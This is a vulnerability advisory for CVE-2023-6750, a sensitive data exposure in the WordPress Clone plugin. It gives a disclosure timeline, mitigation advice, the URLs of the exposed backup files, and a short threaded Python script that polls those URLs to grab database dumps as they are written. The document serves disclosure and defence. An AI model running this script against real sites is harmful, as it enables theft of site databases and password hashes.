A critical vulnerability has been identified in the Clone plugin during testing, specifically within the directory /wordpress/wp-content/uploads/wp-clone/wpclone_backup. This flaw exposes comprehensive information about the site, encompassing its configuration, directories, and files. Most crucially, it grants unauthorized access to sensitive data within the database and all associated content. Exploiting this vulnerability introduces an imminent threat, potentially leading to brute force attacks on password hashes and, consequently, the compromise of the entire system.
Main info:
| CVE | CVE-2023-6750 |
| Plugin | Clone < 2.4.3 |
| Critical | Super High |
| All Time | 3 152 883 |
| Active installations | 90 000+ |
| Publicly Published | December 19, 2023 |
| Last Updated | December 19, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | Yes |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6750 https://wpscan.com/vulnerability/fad9eefe-4552-4d20-a1fd-bb2e172ec8d7/ |
| Plugin Security Certification by CleanTalk |  |
Timeline
| December 11, 2023 | Plugin testing and vulnerability detection in the Clone plugin have been completed |
| December 11, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 15, 2023 | The author fixed the vulnerability and released the plugin update |
| December 19, 2023 | Registered CVE-2023-6750 |
Discovery of the Vulnerability
A severe vulnerability has been discovered in the directory /wordpress/wp-content/uploads/wp-clone/wpclone_backup. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.
Understanding of Sensitive Data Exposure attack’s
Sensitive Data Exposure in WordPress refers to the unintentional exposure of critical information, such as database details, passwords, or other confidential data. Real-world examples highlight the risks associated with unauthorized access to sensitive files and databases, often leading to compromised user accounts, manipulation of data, and the potential for a complete system takeover.
Exploiting the Sensitive Data Exposure Vulnerability
Exploiting this vulnerability involves accessing the exposed directory /wordpress/wp-content/uploads/wp-clone/wpclone_backup to retrieve sensitive information, including database contents and associated files. Attackers could leverage this unauthorized access to launch brute force attacks on password hashes, escalating their control over the compromised system.
POC:
1) The plugin has the ability to backup files and DB. When Admin start backup it is possible to thief data. I will do it manually, but this is similar to automatic scanning.
2) There is a lot of sensitive data and most importantly, you can download a backup file and upload it to your local car:
“http://your_site/wordpress/wp-content/uploads/wp-clone/wpclone_backup/file.list”,
“http://your_site/wordpress/wp-content/uploads/wp-clone/wpclone_backup/database.sql”,
“http://your_site/wordpress/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt”
EXPLOIT (python3):
import requests import time import threading urls = [ "http://127.0.0.1/wordpress/wp-content/uploads/wp-clone/wpclone_backup/file.list", "http://127.0.0.1/wordpress/wp-content/uploads/wp-clone/wpclone_backup/database.sql", "http://127.0.0.1/wordpress/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt" ] print("The following links are checked:") for url in urls: print(url) def check_url(url): while True: try: response = requests.get(url) if response.status_code == 200: print(f"File at {url} found! I display the contents...") print(response.text) except requests.RequestException as e: print(f"Error when requesting to {url}: {e}") time.sleep(0.7) for url in urls: thread = threading.Thread(target=check_url, args=(url,)) thread.start()___
The potential risk of this vulnerability is severe, encompassing unauthorized access to sensitive data, potential data manipulation, and the compromise of the entire system. In real-world scenarios, attackers could exploit this exposure to gain access to critical configuration details, user credentials, and other confidential data. Subsequent brute force attacks on password hashes could lead to account takeovers, further jeopardizing the security and integrity of the WordPress site.
Recommendations for Improved Security
- Directory Security Measures: Implement robust security measures for directories, incorporating access controls, regular audits, and encryption to prevent unauthorized access.
- Access Control: Configure stringent access controls to restrict sensitive data access only to authorized personnel.
- Plugin Update: Regularly update the Clone plugin with the latest security patches to address this vulnerability.
- Password Policy: Enforce strong password policies to mitigate the risk of brute force attacks.
- Security Audits: Conduct regular security audits to identify and rectify potential vulnerabilities within the WordPress environment.
Implementing these security measures will significantly reduce the risk of unauthorized access to sensitive data through the Sensitive Data Exposure vulnerability in the Clone plugin.
#WordPressSecurity #SensitiveDataExposure #WebsiteSafety #StayProtected #SuperHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
